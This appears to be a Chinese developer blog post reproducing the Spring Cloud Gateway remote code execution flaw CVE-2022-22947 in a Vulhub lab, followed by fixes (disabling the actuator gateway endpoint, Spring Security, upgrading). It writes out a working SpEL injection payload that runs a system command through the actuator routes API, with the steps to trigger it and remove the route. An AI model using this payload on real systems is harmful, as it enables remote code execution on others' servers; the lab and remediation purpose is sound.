CVE-2022-22947(SpringCloud Gateway)

已于 2022-11-09 14:28:35 修改
阅读量1.8k 收藏 1
点赞数 1
分类专栏: 漏洞解决 文章标签: spring cloud gateway java
于 2022-11-09 14:27:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43210388/article/details/127769104
版权

参考链接:
1、Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
2、CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
3、Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)
4、actuator.html#actuator.endpoints.security

漏洞影响范围:
Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受支持的版本也会受到影响

漏洞级别:
高危

一、复现1
在测试机192.168.1.197上用docker开启Vulhub靶场环境

docker run -itd -p 8010:8080 --name spring vulhub/spring-cloud-gateway:3.1.0

开始用postman发送(看上面的参考用了Burp Suite和Yakit,后续研究渗透测试,可以主要看下Yakit)
1、添加路由(POST)
http://192.168.1.197:8010/actuator/gateway/routes/hacktest

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

其中让执行whoami
在这里插入图片描述

2、刷新路由(POST)
http://192.168.1.197:8010/actuator/gateway/refresh
在这里插入图片描述

3、获取执行结果(GET)
http://192.168.1.197:8010/actuator/gateway/routes/hacktest
在这里插入图片描述
得到了结果:

{
    "predicate": "RouteDefinitionRouteLocator$$Lambda$964/1378115041",
    "route_id": "hacktest",
    "filters": [
        "[[AddResponseHeader Result = 'root\n'], order = 1]"
    ],
    "uri": "http://example.com:80",
    "order": 0
}

可以看到拿到了用户root的结果

4、删除路由(DELETE)
http://192.168.1.197:8010/actuator/gateway/routes/hacktest
这一步的执行,猜测可能就是摸出攻击痕迹
在这里插入图片描述

5、再一次刷新路由(POST)
http://192.168.1.197:8010/actuator/gateway/refresh
在这里插入图片描述

二、解决方案
1、关闭actuator的gateway

management.endpoint.gateway.enabled=false

在这里插入图片描述

关闭后用postman发送
添加路由(POST)
http://127.0.0.1:30000/actuator/gateway/routes/hacktest

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

其中让执行whoami
在这里插入图片描述

直接就阻挡住了

2、使用Spring Security保护actuator
具体参考:https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security
因为如果作为临时方案,其实用上面的关闭actuator的gateway即可,所以这里不赘述

3、升级到安全版本
此方案一劳永逸解决了CVE-2022-22947漏洞
Spring Cloud Gateway >= 3.1.1
Spring Cloud Gateway >= 3.0.7

一枝花傲寒
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3109
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
xiaobai_20190815的博客
04-08 1万+
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 3月1日,VMware发布安全公告,Spring Cloud Gateway中存在远程代码执行漏洞(CVE-2022-22947),该漏洞的CVSSv3评分为10.0。当启用或暴露不安全的 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序容易受到代
CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
yggcwhat
06-29 2698
CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
Spring-Cloud-Gateway-CVE-2022-22947_spring cloud gateway 3
最新发布
m0_60229361的博客
04-18 304
Spring Cloud Gateway远程代码执行漏洞的安全公告。该漏洞为当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。Spring Cloud Gateway < 3.1.1 Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway 旧的、不受支持的版本也会受到影响 【安全版本】
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 7290
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现。
CVE-2022-22947(Spring-Cloud-Gateway)
Christ1na的博客
04-09 594
`SpringCloud Gateway` 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947 SpringCloud GateWay SpEL RCE CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpEL(Spring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
SpringCloud Gateway 漏洞分析 (CVE-2022-22947).doc
07-08
SpringCloud Gateway 漏洞分析 (CVE-2022-22947) SpringCloud Gateway 是 Spring 提供的微服务实现框架,其中包含网关、配置中心和注册中心等内容。网关是 SpringCloud Gateway 的核心组件之一,提供了统一的流量...
CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
dust_hk的博客
03-07 6448
CVE-2022-22947 SPRINGCLOUD GATEWAY SPEL RCE 摘要 Spring Cloud Gateway的商业产品是分布式API网关,用于路由HTTP请求并处理跨领域问题,如单点登录(SSO),速率限制,访问控制。借助Spring Cloud Gateway forKubernetes,运营商可以专注于管理和监控其目标环境中的API网关,而应用程序开发人员可以专注于API的公开方式,并应用适当的设计和跨领域问题。 在 3.1.1+ 和 3.0.7+ 之前的 spring clo
Spring-Cloud-Gateway-CVE-2022-22947
热门推荐
LiBai'S BLOG
03-04 1万+
漏洞描述 Spring Cloud Gateway远程代码执行漏洞的安全公告。该漏洞为当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。 影响版本 Spring Cloud Gateway < 3.1.1 Spring Cloud Gateway < 3.0.7 Spring Cloud Gateway 旧的、不受支持.
spring_cloud_RCE(CVE-2022-22947)
Kris__zhang的博客
03-04 5361
简介 Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 环境 docker-compose up -d 利用 首先,发送如下数据包即可添加一个包含恶意SpEL表达式的路由: POST /actuator/gateway/routes/lemonlove7 HTTP/1.1 Host: 192.168.80.138:8080 A
CVE-2022-22947-Spring Cloud Gateway远程代码执行漏洞
weixin_59474029的博客
08-21 161
当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
Spring Cloud Gateway远程代码执行漏洞风险
m0_67402774的博客
08-24 1040
近日,VMware 官方发布安全公告,其中包含 Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)。使用 Spring Cloud Gateway 的应用如果对外暴露了 Gateway Actuator 接口,则可能存在被 CVE-2022-22947 漏洞利用的风险,攻击者可通过利用此漏洞执行 SpEL 表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。
CVE-2022-22947
09-05
CVE-2022-22947是一个Spring Cloud Gateway的远程代码执行漏洞。这个漏洞允许攻击者通过构造恶意请求,利用SpEL表达式注入任意代码执行。通过执行恶意代码,攻击者可以获取系统权限并执行任意操作。根据引用中提供的POC,攻击者可以构造特定的请求来利用这个漏洞。 请注意,本回答只是简要介绍了CVE-2022-22947漏洞的基本情况。如果您需要更详细的信息和防范措施,请参考引用提供的GitHub链接以及其他相关资源。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现](https://blog.csdn.net/qq_44281295/article/details/126730174)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值